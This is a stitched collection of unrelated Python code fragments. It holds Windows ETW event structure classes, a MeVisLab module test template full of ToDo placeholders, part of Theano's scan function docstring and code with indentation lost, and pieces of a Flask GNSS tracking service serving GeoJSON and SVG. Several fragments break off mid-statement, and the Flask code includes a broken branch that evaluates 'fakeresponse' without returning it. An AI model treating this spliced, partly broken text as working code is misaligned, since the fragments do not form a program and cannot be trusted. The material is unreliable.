class Microsoft_Windows_AppModel_Exec_180_0(Etw):
    pattern = Struct(
        "PsmKey" / WString
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=181, version=0)
class Microsoft_Windows_AppModel_Exec_181_0(Etw):
    pattern = Struct(
        "PsmKey" / WString
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=182, version=0)
class Microsoft_Windows_AppModel_Exec_182_0(Etw):
    pattern = Struct(
        "AUMID" / WString,
        "ErrorCode" / Int32ul
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=183, version=0)
class Microsoft_Windows_AppModel_Exec_183_0(Etw):
    pattern = Struct(
        "AUMID" / WString
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=184, version=0)
class Microsoft_Windows_AppModel_Exec_184_0(Etw):
    pattern = Struct(
        "AUMID" / WString,
        "Exemption" / Int64ul
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=185, version=0)
class Microsoft_Windows_AppModel_Exec_185_0(Etw):
    pattern = Struct(
        "AUMID" / WString
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=186, version=0)
class Microsoft_Windows_AppModel_Exec_186_0(Etw):
    pattern = Struct(
        "PsmKey" / WString,
        "State" / Int32ul,
        "ErrorCode" / Int32ul
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=187, version=0)
class Microsoft_Windows_AppModel_Exec_187_0(Etw):
    pattern = Struct(
        "PsmKey" / WString
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=188, version=0)
class Microsoft_Windows_AppModel_Exec_188_0(Etw):
    pattern = Struct(
        "PsmKey" / WString,
        "ErrorCode" / Int32ul
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=189, version=0)
class Microsoft_Windows_AppModel_Exec_189_0(Etw):
    pattern = Struct(
        "PsmKey" / WString,
        "State" / Int32ul
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=190, version=0)
class Microsoft_Windows_AppModel_Exec_190_0(Etw):
    pattern = Struct(
        "PsmKey" / WString
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=191, version=0)
class Microsoft_Windows_AppModel_Exec_191_0(Etw):
    pattern = Struct(
        "PsmKey" / WString
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=192, version=0)
class Microsoft_Windows_AppModel_Exec_192_0(Etw):
    pattern = Struct(
        "PsmKey" / WString
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=193, version=0)
class Microsoft_Windows_AppModel_Exec_193_0(Etw):
    pattern = Struct(
        "PsmKey" / WString,
        "ErrorCode" / Int32ul
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=194, version=0)
class Microsoft_Windows_AppModel_Exec_194_0(Etw):
    pattern = Struct(
        "PsmKey" / WString,
        "State" / Int32ul
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=195, version=0)
class Microsoft_Windows_AppModel_Exec_195_0(Etw):
    pattern = Struct(
        "PsmKey" / WString,
        "State" / Int32ul,
        "ErrorCode" / Int32ul
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=196, version=0)
class Microsoft_Windows_AppModel_Exec_196_0(Etw):
    pattern = Struct(
        "PsmKey" / WString,
        "Bool" / Int8ul
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=197, version=0)
class Microsoft_Windows_AppModel_Exec_197_0(Etw):
    pattern = Struct(
        "PsmKey" / WString,
        "State" / Int32ul
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=198, version=0)
class Microsoft_Windows_AppModel_Exec_198_0(Etw):
    pattern = Struct(
        "PackageFullName" / WString
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=199, version=0)
class Microsoft_Windows_AppModel_Exec_199_0(Etw):
    pattern = Struct(
        "PackageFullName" / WString
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=200, version=0)
class Microsoft_Windows_AppModel_Exec_200_0(Etw):
    pattern = Struct(
        "PackageFullName" / WString,
        "ErrorCode" / Int32ul
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=201, version=0)
class Microsoft_Windows_AppModel_Exec_201_0(Etw):
    pattern = Struct(
        "PackageFullName" / WString,
        "ErrorCode" / Int32ul
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=202, version=0)
class Microsoft_Windows_AppModel_Exec_202_0(Etw):
    pattern = Struct(
        "PackageFullName" / WString,
        "ErrorCode" / Int32ul
    )


@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=203, version=0)
class Microsoft_Windows_AppModel_Exec_203_0(Etw):
    pattern = Struct(
        "ValueName" / WString,
        "Timeout" / Int32ul
    )
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=204, version=0)
class Microsoft_Windows_AppModel_Exec_204_0(Etw):
pattern = Struct(
| |
# Repository: hjkuijf/MidsagittalApp
# **InsertLicense** code
from mevis import *
from TestSupport import Base, Fields, Logging, ScreenShot
from TestSupport.Macros import *
from AlgorithmModuleTestSupport import Checks as AMChecks
from AlgorithmModuleTestSupport import Tests as AMTests
from AlgorithmModule.Definitions import StatusCode
#----------------------------------------------------------------------------------
MODULE_NAME = "MidsagittalSurfaceSplit"
class TestData( object ):
    """One test case: the module's input field values plus the path to the
    corresponding reference output."""

    def __init__( self ):
        # Input object file paths.
        self.input0Path = None
        self.inMidsagittalSurfacePath = None
        # Module parameter values.
        self.inIntersectionMode = None
        self.inVolumeThreshold = None
        self.inUseGlobalSubsample = None
        self.inGlobalSubsample = None
        self.inXSubsample = None
        self.inYSubsample = None
        self.inZSubsample = None
        # Reference output file path.
        self.output0ReferencePath = None
def executeTestOfUpdate( testData ):
    """Runs one complete update test: provide inputs, update the module, validate outputs."""
    __provideInput( testData )
    __processInput()
    __validateOutput( testData )
def __provideInput( testData ):
    """Feeds the given TestData into the test network."""
    __setUpNetworkWithInput( testData )
def __setUpNetworkWithInput( testData ):
    """Loads input objects and transfers input parameter values from testData."""
    __setUpInputObjects( testData )
    __setUpInputParameters( testData )
def __setUpInputObjects( testData ):
    """Loads the image and the midsagittal surface via the local loader modules."""
    __loadFileWithLocalModule( "Load_input0", testData.input0Path )
    __loadFileWithLocalModule( "Load_inMidsagittalSurface", testData.inMidsagittalSurfacePath )
def __loadFileWithLocalModule( moduleName, filePath ):
    """Loads filePath with the given loader module; closes the loader when filePath is None.

    A None path is the convention used by the tests to provide "no object".
    """
    # Fix: compare against None with `is not None` instead of `!= None` (PEP 8).
    if filePath is not None:
        Fields.setValue( "{}.name".format( moduleName ), filePath )
        Fields.touch( "{}.load".format( moduleName ))
    else:
        Fields.touch( "{}.close".format( moduleName ))
def __setUpInputParameters( testData ):
    """Transfers all scalar input parameters from testData to the module's fields."""
    for parameterName in ( "inIntersectionMode",
                           "inVolumeThreshold",
                           "inUseGlobalSubsample",
                           "inGlobalSubsample",
                           "inXSubsample",
                           "inYSubsample",
                           "inZSubsample" ):
        Fields.setValue( "{}.{}".format( MODULE_NAME, parameterName ),
                         getattr( testData, parameterName ))
def __processInput():
    """Triggers the module update through the AlgorithmModule test support."""
    AMTests.testUpdate( MODULE_NAME )
def __validateOutput( testData ):
    """Loads the reference output and runs the validation checks against it."""
    __setUpNetworkWithOutputReference( testData )
    __executeChecksToValidateOutput( testData )
def __setUpNetworkWithOutputReference( testData ):
    """Prepares the network side that holds the expected (reference) output."""
    __setUpOutputReferenceObjects( testData )
def __setUpOutputReferenceObjects( testData ):
    """Loads the reference output image via its local loader module."""
    __loadFileWithLocalModule( "Load_output0_Reference", testData.output0ReferencePath )
def __executeChecksToValidateOutput( testData ):
    """Executes every configured check that validates the module output."""
    for outputCheck in __getChecksToValidateOutputAfterUpdate( testData ):
        outputCheck.execute()
def __getChecksToValidateOutputAfterUpdate( testData ):
    """Returns the tuple of checks comparing the module output against the reference."""
    return ( AMChecks.ImageCompareCheck( "Validate_output0" ), )
def __getDefaultTestData():
    """Returns a default and valid TestData object."""
    Logging.infoHTML( "<b>ToDo: Set valid values for default TestData object!</b>" )
    testData = TestData()
    # NOTE: the assignments below are redundant (TestData.__init__ already sets
    # every field to None); they are template placeholders meant to be edited.
    testData.input0Path = None
    testData.inMidsagittalSurfacePath = None
    testData.inIntersectionMode = None
    testData.inVolumeThreshold = None
    testData.inUseGlobalSubsample = None
    testData.inGlobalSubsample = None
    testData.inXSubsample = None
    testData.inYSubsample = None
    testData.inZSubsample = None
    testData.output0ReferencePath = None
    return testData
#----------------------------------------------------------------------------------
def ITERATIVETEST_Error_Of_Input_Image_input0():
    """Tests occurrence of an error because of an invalid image provided at field "input0"."""
    # Returns (testDataVariations, testFunction) consumed by the iterative test framework.
    Logging.infoHTML( "<b>ToDo: Add more \"TestData\" objects to maximize variations!</b>" )
    testDataVariations = {
        "Missing_Object" : __getMissingObjectTestData_input0(),
    }
    return ( testDataVariations, testError_input0 )
def __getMissingObjectTestData_input0():
    """Returns test data where no image is provided at "input0"."""
    testData = __getDefaultTestData()
    # Note: None as path value prevents loading.
    testData.input0Path = None
    return testData
def testError_input0( testData ):
    """Expects the update to fail with statusCode == ERROR_INPUT_OBJECT."""
    __provideInput( testData )
    checksToExecute = (
        AMChecks.EqualCheck( fieldName = "{}.statusCode".format( MODULE_NAME ),
                             value = StatusCode.ERROR_INPUT_OBJECT ),
    )
    AMTests.testFailedUpdate( MODULE_NAME, checksToExecute )
#----------------------------------------------------------------------------------
def ITERATIVETEST_Error_Of_Input_Base_inMidsagittalSurface():
    """Tests occurrence of an error because of an invalid Base object connected at field "inMidsagittalSurface"."""
    # Returns (testDataVariations, testFunction) consumed by the iterative test framework.
    Logging.infoHTML( "<b>ToDo: Add more \"TestData\" objects to maximize variations!</b>" )
    testDataVariations = {
        "Missing_Object" : __getMissingObjectTestData_inMidsagittalSurface(),
        "Empty_Object" : __getEmptyObjectTestData_inMidsagittalSurface(),
    }
    return ( testDataVariations, testError_inMidsagittalSurface )
def __getMissingObjectTestData_inMidsagittalSurface():
    """Returns test data where no surface object is provided at "inMidsagittalSurface"."""
    testData = __getDefaultTestData()
    # Note: None as path value prevents loading.
    testData.inMidsagittalSurfacePath = None
    return testData
def __getEmptyObjectTestData_inMidsagittalSurface():
    """Returns test data intended to load an *empty* surface object (path still a ToDo)."""
    testData = __getDefaultTestData()
    Logging.infoHTML( "<b>ToDo: Replace \"None\" with a path pointing to an empty object!</b>" )
    testData.inMidsagittalSurfacePath = None
    return testData
def testError_inMidsagittalSurface( testData ):
    """Expects the update to fail with statusCode == ERROR_INPUT_OBJECT."""
    __provideInput( testData )
    checksToExecute = (
        AMChecks.EqualCheck( fieldName = "{}.statusCode".format( MODULE_NAME ),
                             value = StatusCode.ERROR_INPUT_OBJECT ),
    )
    AMTests.testFailedUpdate( MODULE_NAME, checksToExecute )
#----------------------------------------------------------------------------------
def ITERATIVETEST_Error_Of_Input_Parameter_inIntersectionMode():
    """Tests occurrence of an error because of an invalid input value provided at field "inIntersectionMode"."""
    # Returns (testDataVariations, testFunction) consumed by the iterative test framework.
    Logging.infoHTML( "<b>ToDo: Add more \"TestData\" objects to maximize variations!</b>" )
    testDataVariations = {
        "Invalid_Variation_1" : __getInvalidTestDataVariation1_inIntersectionMode(),
        "Invalid_Variation_2" : __getInvalidTestDataVariation2_inIntersectionMode(),
    }
    return ( testDataVariations, testError_inIntersectionMode )
def __getInvalidTestDataVariation1_inIntersectionMode():
    """Template: returns test data with an invalid "inIntersectionMode" value (still a ToDo)."""
    Logging.infoHTML( "<b>ToDo: Rename function that the name matches the intention of returned test data!</b>" )
    testData = __getDefaultTestData()
    Logging.infoHTML( "<b>ToDo: Replace \"None\" with a reliable invalid value of \"inIntersectionMode\"!</b>" )
    testData.inIntersectionMode = None
    return testData
def __getInvalidTestDataVariation2_inIntersectionMode():
    """Template: returns test data with an invalid "inIntersectionMode" value (still a ToDo)."""
    Logging.infoHTML( "<b>ToDo: Rename function that the name matches the intention of returned test data!</b>" )
    testData = __getDefaultTestData()
    Logging.infoHTML( "<b>ToDo: Replace \"None\" with a reliable invalid value of \"inIntersectionMode\"!</b>" )
    testData.inIntersectionMode = None
    return testData
def testError_inIntersectionMode( testData ):
    """Expects the update to fail with statusCode == ERROR_INPUT_PARAMETER."""
    __provideInput( testData )
    checksToExecute = (
        AMChecks.EqualCheck( fieldName = "{}.statusCode".format( MODULE_NAME ),
                             value = StatusCode.ERROR_INPUT_PARAMETER ),
    )
    AMTests.testFailedUpdate( MODULE_NAME, checksToExecute )
#----------------------------------------------------------------------------------
def ITERATIVETEST_Error_Of_Input_Parameter_inVolumeThreshold():
    """Tests occurrence of an error because of an invalid input value provided at field "inVolumeThreshold"."""
    # Returns (testDataVariations, testFunction) consumed by the iterative test framework.
    Logging.infoHTML( "<b>ToDo: Add more \"TestData\" objects to maximize variations!</b>" )
    testDataVariations = {
        "Invalid_Variation_1" : __getInvalidTestDataVariation1_inVolumeThreshold(),
        "Invalid_Variation_2" : __getInvalidTestDataVariation2_inVolumeThreshold(),
    }
    return ( testDataVariations, testError_inVolumeThreshold )
def __getInvalidTestDataVariation1_inVolumeThreshold():
    """Template: returns test data with an invalid "inVolumeThreshold" value (still a ToDo)."""
    Logging.infoHTML( "<b>ToDo: Rename function that the name matches the intention of returned test data!</b>" )
    testData = __getDefaultTestData()
    Logging.infoHTML( "<b>ToDo: Replace \"None\" with a reliable invalid value of \"inVolumeThreshold\"!</b>" )
    testData.inVolumeThreshold = None
    return testData
def __getInvalidTestDataVariation2_inVolumeThreshold():
    """Template: returns test data with an invalid "inVolumeThreshold" value (still a ToDo)."""
    Logging.infoHTML( "<b>ToDo: Rename function that the name matches the intention of returned test data!</b>" )
    testData = __getDefaultTestData()
    Logging.infoHTML( "<b>ToDo: Replace \"None\" with a reliable invalid value of \"inVolumeThreshold\"!</b>" )
    testData.inVolumeThreshold = None
    return testData
def testError_inVolumeThreshold( testData ):
    """Expects the update to fail with statusCode == ERROR_INPUT_PARAMETER."""
    __provideInput( testData )
    checksToExecute = (
        AMChecks.EqualCheck( fieldName = "{}.statusCode".format( MODULE_NAME ),
                             value = StatusCode.ERROR_INPUT_PARAMETER ),
    )
    AMTests.testFailedUpdate( MODULE_NAME, checksToExecute )
#----------------------------------------------------------------------------------
def ITERATIVETEST_Error_Of_Input_Parameter_inUseGlobalSubsample():
    """Tests occurrence of an error because of an invalid input value provided at field "inUseGlobalSubsample"."""
    # Returns (testDataVariations, testFunction) consumed by the iterative test framework.
    Logging.infoHTML( "<b>ToDo: Add more \"TestData\" objects to maximize variations!</b>" )
    testDataVariations = {
        "Invalid_Variation_1" : __getInvalidTestDataVariation1_inUseGlobalSubsample(),
        "Invalid_Variation_2" : __getInvalidTestDataVariation2_inUseGlobalSubsample(),
    }
    return ( testDataVariations, testError_inUseGlobalSubsample )
def __getInvalidTestDataVariation1_inUseGlobalSubsample():
    """Template: returns test data with an invalid "inUseGlobalSubsample" value (still a ToDo)."""
    Logging.infoHTML( "<b>ToDo: Rename function that the name matches the intention of returned test data!</b>" )
    testData = __getDefaultTestData()
    Logging.infoHTML( "<b>ToDo: Replace \"None\" with a reliable invalid value of \"inUseGlobalSubsample\"!</b>" )
    testData.inUseGlobalSubsample = None
    return testData
def __getInvalidTestDataVariation2_inUseGlobalSubsample():
    """Template: returns test data with an invalid "inUseGlobalSubsample" value (still a ToDo)."""
    Logging.infoHTML( "<b>ToDo: Rename function that the name matches the intention of returned test data!</b>" )
    testData = __getDefaultTestData()
    Logging.infoHTML( "<b>ToDo: Replace \"None\" with a reliable invalid value of \"inUseGlobalSubsample\"!</b>" )
    testData.inUseGlobalSubsample = None
    return testData
def testError_inUseGlobalSubsample( testData ):
    """Expects the update to fail with statusCode == ERROR_INPUT_PARAMETER."""
    __provideInput( testData )
    checksToExecute = (
        AMChecks.EqualCheck( fieldName = "{}.statusCode".format( MODULE_NAME ),
                             value = StatusCode.ERROR_INPUT_PARAMETER ),
    )
    AMTests.testFailedUpdate( MODULE_NAME, checksToExecute )
#----------------------------------------------------------------------------------
def ITERATIVETEST_Error_Of_Input_Parameter_inGlobalSubsample():
    """Tests occurrence of an error because of an invalid input value provided at field "inGlobalSubsample"."""
    # Returns (testDataVariations, testFunction) consumed by the iterative test framework.
    Logging.infoHTML( "<b>ToDo: Add more \"TestData\" objects to maximize variations!</b>" )
    testDataVariations = {
        "Invalid_Variation_1" : __getInvalidTestDataVariation1_inGlobalSubsample(),
        "Invalid_Variation_2" : __getInvalidTestDataVariation2_inGlobalSubsample(),
    }
    return ( testDataVariations, testError_inGlobalSubsample )
def __getInvalidTestDataVariation1_inGlobalSubsample():
    """Template: returns test data with an invalid "inGlobalSubsample" value (still a ToDo)."""
    Logging.infoHTML( "<b>ToDo: Rename function that the name matches the intention of returned test data!</b>" )
    testData = __getDefaultTestData()
    Logging.infoHTML( "<b>ToDo: Replace \"None\" with a reliable invalid value of \"inGlobalSubsample\"!</b>" )
    testData.inGlobalSubsample = None
    return testData
def __getInvalidTestDataVariation2_inGlobalSubsample():
    """Template: returns test data with an invalid "inGlobalSubsample" value (still a ToDo)."""
    Logging.infoHTML( "<b>ToDo: Rename function that the name matches the intention of returned test data!</b>" )
    testData = __getDefaultTestData()
    Logging.infoHTML( "<b>ToDo: Replace \"None\" with a reliable invalid value of \"inGlobalSubsample\"!</b>" )
    testData.inGlobalSubsample = None
    return testData
def testError_inGlobalSubsample( testData ):
    """Expects the update to fail with statusCode == ERROR_INPUT_PARAMETER."""
    __provideInput( testData )
    checksToExecute = (
        AMChecks.EqualCheck( fieldName = "{}.statusCode".format( MODULE_NAME ),
                             value = StatusCode.ERROR_INPUT_PARAMETER ),
    )
    AMTests.testFailedUpdate( MODULE_NAME, checksToExecute )
#----------------------------------------------------------------------------------
def ITERATIVETEST_Error_Of_Input_Parameter_inXSubsample():
    """Tests occurrence of an error because of an invalid input value provided at field "inXSubsample"."""
    # Returns (testDataVariations, testFunction) consumed by the iterative test framework.
    Logging.infoHTML( "<b>ToDo: Add more \"TestData\" objects to maximize variations!</b>" )
    testDataVariations = {
        "Invalid_Variation_1" : __getInvalidTestDataVariation1_inXSubsample(),
        "Invalid_Variation_2" : __getInvalidTestDataVariation2_inXSubsample(),
    }
    return ( testDataVariations, testError_inXSubsample )
def __getInvalidTestDataVariation1_inXSubsample():
    """Template: returns test data with an invalid "inXSubsample" value (still a ToDo)."""
    Logging.infoHTML( "<b>ToDo: Rename function that the name matches the intention of returned test data!</b>" )
    testData = __getDefaultTestData()
    Logging.infoHTML( "<b>ToDo: Replace \"None\" with a reliable invalid value of \"inXSubsample\"!</b>" )
    testData.inXSubsample = None
    return testData
def __getInvalidTestDataVariation2_inXSubsample():
    """Template: returns test data with an invalid "inXSubsample" value (still a ToDo)."""
    Logging.infoHTML( "<b>ToDo: Rename function that the name matches the intention of returned test data!</b>" )
    testData = __getDefaultTestData()
    Logging.infoHTML( "<b>ToDo: Replace \"None\" with a reliable invalid value of \"inXSubsample\"!</b>" )
    testData.inXSubsample = None
    return testData
def testError_inXSubsample( testData ):
    """Expects the update to fail with statusCode == ERROR_INPUT_PARAMETER."""
    __provideInput( testData )
    checksToExecute = (
        AMChecks.EqualCheck( fieldName = "{}.statusCode".format( MODULE_NAME ),
                             value = StatusCode.ERROR_INPUT_PARAMETER ),
    )
    AMTests.testFailedUpdate( MODULE_NAME, checksToExecute )
#----------------------------------------------------------------------------------
def ITERATIVETEST_Error_Of_Input_Parameter_inYSubsample():
    """Tests occurrence of an error because of an invalid input value provided at field "inYSubsample"."""
    # Returns (testDataVariations, testFunction) consumed by the iterative test framework.
    Logging.infoHTML( "<b>ToDo: Add more \"TestData\" objects to maximize variations!</b>" )
    testDataVariations = {
        "Invalid_Variation_1" : __getInvalidTestDataVariation1_inYSubsample(),
        "Invalid_Variation_2" : __getInvalidTestDataVariation2_inYSubsample(),
    }
    return ( testDataVariations, testError_inYSubsample )
def __getInvalidTestDataVariation1_inYSubsample():
    """Template: returns test data with an invalid "inYSubsample" value (still a ToDo)."""
    Logging.infoHTML( "<b>ToDo: Rename function that the name matches the intention of returned test data!</b>" )
    testData = __getDefaultTestData()
    Logging.infoHTML( "<b>ToDo: Replace \"None\" with a reliable invalid value of \"inYSubsample\"!</b>" )
    testData.inYSubsample = None
    return testData
def __getInvalidTestDataVariation2_inYSubsample():
    """Template: returns test data with an invalid "inYSubsample" value (still a ToDo)."""
    Logging.infoHTML( "<b>ToDo: Rename function that the name matches the intention of returned test data!</b>" )
    testData = __getDefaultTestData()
    Logging.infoHTML( "<b>ToDo: Replace \"None\" with a reliable invalid value of \"inYSubsample\"!</b>" )
    testData.inYSubsample = None
    return testData
def testError_inYSubsample( testData ):
__provideInput( testData )
checksToExecute = (
AMChecks.EqualCheck( fieldName = | |
will be ``x[k:]``. Looking at this split, elements in
``x[:k]`` are ordered exactly like those in ``init_y``.
        * ``taps`` -- Temporal taps of the output that will be passed to
``fn``. They are provided as a list of *negative* integers,
where a value ``k`` implies that at iteration step ``t`` scan
will pass to ``fn`` the slice ``t+k``.
``scan`` will follow this logic if partial information is given:
* If an output is not wrapped in a dictionary, ``scan`` will wrap
it in one assuming that you use only the last step of the output
(i.e. it makes your tap value list equal to [-1]).
* If you wrap an output in a dictionary and you do not provide any
taps but you provide an initial state it will assume that you are
using only a tap value of -1.
* If you wrap an output in a dictionary but you do not provide any
initial state, it assumes that you are not using any form of
taps.
* If you provide a ``None`` instead of a variable or a empty
dictionary ``scan`` assumes that you will not use any taps for
this output (like for example in case of a map)
If ``outputs_info`` is an empty list or None, ``scan`` assumes
that no tap is used for any of the outputs. If information is
provided just for a subset of the outputs an exception is
raised (because there is no convention on how scan should map
the provided information to the outputs of ``fn``)
non_sequences
``non_sequences`` is the list of arguments that are passed to
        ``fn`` at each step. One can opt to exclude variables
used in ``fn`` from this list as long as they are part of the
computational graph, though for clarity we encourage not to do so.
n_steps
``n_steps`` is the number of steps to iterate given as an int
or Theano scalar. If any of the input sequences do not have
enough elements, scan will raise an error. If the *value is 0* the
outputs will have *0 rows*. If the value is negative, ``scan``
will run backwards in time. If the ``go_backwards`` flag is already
set and also ``n_steps`` is negative, ``scan`` will run forward
in time. If n_steps is not provided, ``scan`` will figure
out the amount of steps it should run given its input sequences.
truncate_gradient
``truncate_gradient`` is the number of steps to use in truncated
BPTT. If you compute gradients through a scan op, they are
computed using backpropagation through time. By providing a
different value then -1, you choose to use truncated BPTT instead
of classical BPTT, where you go for only ``truncate_gradient``
number of steps back in time.
go_backwards
``go_backwards`` is a flag indicating if ``scan`` should go
backwards through the sequences. If you think of each sequence
as indexed by time, making this flag True would mean that
``scan`` goes back in time, namely that for any sequence it
starts from the end and goes towards 0.
name
When profiling ``scan``, it is crucial to provide a name for any
instance of ``scan``. The profiler will produce an overall
profile of your code as well as profiles for the computation of
one step of each instance of ``scan``. The ``name`` of the instance
appears in those profiles and can greatly help to disambiguate
information.
mode
It is recommended to leave this argument to None, especially
when profiling ``scan`` (otherwise the results are not going to
be accurate). If you prefer the computations of one step of
        ``scan`` to be done differently than the entire function, you
can use this parameter to describe how the computations in this
loop are done (see ``theano.function`` for details about
possible values and their meaning).
profile
Flag or string. If true, or different from the empty string, a
profile object will be created and attached to the inner graph of
scan. In case ``profile`` is True, the profile object will have the
name of the scan instance, otherwise it will have the passed string.
Profile object collect (and print) information only when running the
inner graph with the new cvm linker ( with default modes,
other linkers this argument is useless)
allow_gc
Set the value of allow gc for the internal graph of scan. If
set to None, this will use the value of config.scan.allow_gc.
strict
If true, all the shared variables used in ``fn`` must be provided as a
part of ``non_sequences`` or ``sequences``.
Returns
-------
tuple
Tuple of the form (outputs, updates); ``outputs`` is either a
Theano variable or a list of Theano variables representing the
outputs of ``scan`` (in the same order as in ``outputs_info``).
``updates`` is a subclass of dictionary specifying the update rules for
all shared variables used in scan.
This dictionary should be passed to ``theano.function`` when you compile
your function. The change compared to a normal dictionary is that we
validate that keys are SharedVariable and addition of those dictionary
are validated to be consistent.
"""
# General observation : this code is executed only once, at creation
# of the computational graph, so we don't yet need to be smart about
# anything (to speed things up)
##
# Step 1. Wrap all inputs in dictionaries and add default values
##
# check if inputs are just single variables instead of lists
    def wrap_into_list(x):
        """
        Wrap the input into a list if it is not already a list.

        None becomes an empty list, a tuple is converted to a list,
        and any other value is wrapped as a single-element list.
        """
        if x is None:
            return []
        elif not isinstance(x, (list, tuple)):
            return [x]
        else:
            return list(x)
seqs = wrap_into_list(sequences)
outs_info = wrap_into_list(outputs_info)
# Make sure we get rid of numpy arrays or ints or anything like that
# passed as inputs to scan
non_seqs = []
for elem in wrap_into_list(non_sequences):
if not isinstance(elem, gof.Variable):
non_seqs.append(tensor.as_tensor_variable(elem))
else:
non_seqs.append(elem)
# If we provided a known number of steps ( before compilation)
# and if that number is 1 or -1, then we can skip the Scan Op,
# and just apply the inner function once
# To do that we check here to see the nature of n_steps
n_fixed_steps = None
if isinstance(n_steps, (float, int)):
n_fixed_steps = int(n_steps)
else:
try:
n_fixed_steps = opt.get_scalar_constant_value(n_steps)
except tensor.basic.NotScalarConstantError:
n_fixed_steps = None
# Check n_steps is an int
if (hasattr(n_steps, 'dtype') and
str(n_steps.dtype)[:3] not in ('uin', 'int')):
raise ValueError(' n_steps must be an int. dtype provided '
'is %s' % n_steps.dtype)
# compute number of sequences and number of outputs
n_seqs = len(seqs)
n_outs = len(outs_info)
return_steps = OrderedDict()
# wrap sequences in a dictionary if they are not already dictionaries
for i in xrange(n_seqs):
if not isinstance(seqs[i], dict):
seqs[i] = OrderedDict([('input', seqs[i]), ('taps', [0])])
elif seqs[i].get('taps', None) is not None:
seqs[i]['taps'] = wrap_into_list(seqs[i]['taps'])
elif seqs[i].get('taps', None) is None:
# seqs dictionary does not have the ``taps`` key
seqs[i]['taps'] = [0]
# wrap outputs info in a dictionary if they are not already in one
for i in xrange(n_outs):
if outs_info[i] is not None:
if isinstance(outs_info[i], dict):
# DEPRECATED :
if outs_info[i].get('return_steps', None) is not None:
raise ValueError(
"Using `return_steps` has been deprecated. "
"Simply select the entries you need using a "
"subtensor. Scan will optimize memory "
"consumption, so do not worry about that.")
# END
if not isinstance(outs_info[i], dict):
# by default any output has a tap value of -1
outs_info[i] = OrderedDict([('initial', outs_info[i]), ('taps', [-1])])
elif (outs_info[i].get('initial', None) is None and
outs_info[i].get('taps', None) is not None):
# ^ no initial state but taps provided
raise ValueError(('If you are using slices of an output '
'you need to provide a initial state '
'for it'), outs_info[i])
elif (outs_info[i].get('initial', None) is not None and
outs_info[i].get('taps', None) is None):
# ^ initial state but taps not provided
if 'taps' in outs_info[i]:
| |
limit
)
)
current_app.logger.debug(q2)
result = db.session.execute(q2)
trackjson = result.fetchall()
if trackjson:
# if we have only one point
if len(trackjson) == 1:
y = trackjson[0][0]
# if we want multiple points
else:
y = ""
z = 0
for x in trackjson:
if z != 0:
y += ", "
y += x[0]
z += 1
data = '{"type":"FeatureCollection","features":[' + y + "]}"
current_app.logger.debug(y)
response = current_app.response_class(
response=data, status=200, mimetype="application/json"
)
return response
else:
fakeresponse
else:
return fakeresponse
# if track does not exist in our database, we are sending a fake one
# instead of
else:
return fakeresponse
@blueprint.route("/gnss/img/<string:track_rid>.svg")
def geosvg(track_rid):
    """Sends an SVG drawing built from a track's points.

    Unknown tracks get a placeholder SVG so the response shape stays stable.
    """
    # fake response is the same for all cases
    fakesvg = '<svg xmlns="http://www.w3.org/2000/svg" width="400" height="180">\
    <rect x="50" y="20" rx="20" ry="20" width="150" height="150" style="\
    fill:red;stroke:black;stroke-width:5;opacity:0.5" /></svg>'
    fakeresponse = current_app.response_class(
        response=fakesvg, status=200, mimetype="image/svg+xml"
    )
    # check if track_rid was provided and is a string, else flask sends 404
    if isinstance(track_rid, str):
        # check if track exist
        rid = uuid.UUID(track_rid)
        r1 = Trackz.query.filter_by(id=rid).first()
        if not r1:
            # if track does not exist in our database, we are sending a fake one
            # instead of
            return fakeresponse
        # here we ask for a specific track in plain SQL as it is simpler
        # we cut results to 6 decimal places as it gives ~11cm accuracy which is enough
        # SECURITY FIX: track_rid was interpolated with str.format directly into
        # the SQL text; use a bound parameter instead to prevent SQL injection.
        sql = text(
            "SELECT ST_AsSVG(ST_MakeLine(ST_Transform(points.geom,4326) ORDER BY points.timez),1,6) \
    FROM points WHERE points.track_id = :track_id;"
        )
        result = db.session.execute(sql, {"track_id": track_rid})
        tracksvg = result.fetchone()  # TODO: maybe .fetchall() some day?
        current_app.logger.debug(tracksvg)
        data = '<svg xmlns="http://www.w3.org/2000/svg">\
    <path d="{}" fill="cadetblue" /></svg>'.format(
            tracksvg[0]
        )
        response = current_app.response_class(
            response=data, status=200, mimetype="image/svg+xml"
        )
        db.session.close()
        return response
@blueprint.route("/gnss/data/opengts")
def opengts():
    """Receives data from OpenGTS compatible receiver device.

    http://www.opengts.org/OpenGTS_Config.pdf
    http://www.geotelematic.com/docs/StatusCodes.pdf
    """
    alt = request.args.get("alt")
    apicode = request.args.get("acct")
    code = request.args.get("code")
    gprmc = request.args.get("gprmc")
    device = request.args.get("id")
    current_app.logger.debug("alt = {}".format(alt))
    current_app.logger.debug("id = {}".format(apicode))
    current_app.logger.debug("code = {}".format(code))
    current_app.logger.debug("device = {}".format(device))
